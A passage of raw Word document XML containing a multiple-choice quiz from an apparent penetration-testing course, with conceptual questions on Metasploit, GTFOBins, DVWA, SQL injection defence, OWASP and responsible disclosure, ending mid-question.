        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Low</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Medium</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> High</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Critical</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> In Metasploit, which module type contains the vulnerability-exploiting code itself?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Encoder</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Auxiliary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> GTFOBins is primarily used to find:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Known CVEs for web servers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ways to abuse standard Unix binaries for privilege escalation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Wireless password defaults</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> DNS misconfigurations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q6.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Which DVWA vulnerability class is tested using Burp Intruder's Sniper attack against a login form?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Broken authentication / brute force</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSRF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> File upload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q7.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Which is the correct primary defence against SQL Injection?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSRF tokens</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Parameterised queries</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Content Security Policy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Account lockout</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q8.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Which organisation's Top 10 list structures Unit IV of this course?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> MITRE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> OWASP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> SANS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> NIST</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q9.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> A tester discovers a vulnerability outside the agreed scope. The correct ethical action is to:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploit it immediately to prove it's real</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ignore it forever</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Report it through responsible disclosure / seek written approval before testing further</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Publish it on social media</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q10.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Which certification is most associated with a fully hands-on exam requiring compromise of real lab machines?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> CompTIA Security+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
